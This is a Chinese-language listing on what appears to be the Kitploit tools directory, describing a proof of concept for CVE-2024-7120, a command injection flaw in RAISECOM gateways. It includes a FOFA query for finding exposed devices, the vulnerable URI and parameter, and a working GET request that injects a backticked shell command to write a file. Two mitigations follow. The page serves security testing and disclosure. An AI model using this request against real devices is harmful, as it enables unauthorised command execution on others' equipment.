Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-7120 — 针对RAISECOM网关设备中CVE-2024-7120命令注入漏洞的概念验证漏洞利用。提供漏洞利用细节、受影响型号和基于curl的攻击示例,用于安全测试。 | Kitploit
工具/GitHubGitHub/gh-ost00/cve-2024-7120
物联网安全漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubgh-ost00/cve-2024-7120

CVE-2024-7120

针对RAISECOM网关设备中CVE-2024-7120命令注入漏洞的概念验证漏洞利用。提供漏洞利用细节、受影响型号和基于curl的攻击示例,用于安全测试。

查看仓库
8222年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Raisecom 设备命令注入 (CVE-2024-7120) 概念验证!

概述

已在 RAISECOM 网关设备中发现一个命令注入漏洞,影响型号 MSG1200、MSG2100E、MSG2200 和 MSG2300。该漏洞允许远程攻击者通过 Web 界面在系统上执行任意命令。问题存在于 list_base_config.php 脚本中,具体通过 template 参数触发,影响互联网上超过 25,112 台设备。

✔ FOFA : title="web user login" && body="<META content="MSHTML 6.00.2900.5583" name=GENERATOR>"

banner

受影响设备

硬件

  • RAISECOM 网关型号 MSG1200、MSG2100E、MSG2200、MSG2300

软件

  • 3.90

受影响组件

URI: /vpn/list_base_config.php

描述: list_base_config.php 是 RAISECOM 网关设备中用于管理 VPN 配置的基于 Web 的界面组件。已识别的漏洞源于该脚本对 template 参数的处理不当。由于输入清理不足,该参数可被利用在设备操作系统上执行任意命令。

CWE

CWE-77: 命令注入

漏洞利用

以下是使用 curl 命令利用该漏洞的示例:

root@kitploit:~
GET "http://host.com/vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{Created by Ghost sec}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60"

在此示例中,curl 命令向 list_base_config.php 脚本发送一个恶意 HTTP GET 请求。该请求利用 template 参数执行命令。

实际结果

示例 1

banner

示例 2

banner

修复建议

  1. 输入验证: 对所有用户输入实施严格的验证检查,尤其是那些可能影响系统命令或文件路径的输入。
  2. 访问控制: 将设备 Web 界面的访问权限限制为受信任的网络和经过身份验证的用户。
下载工具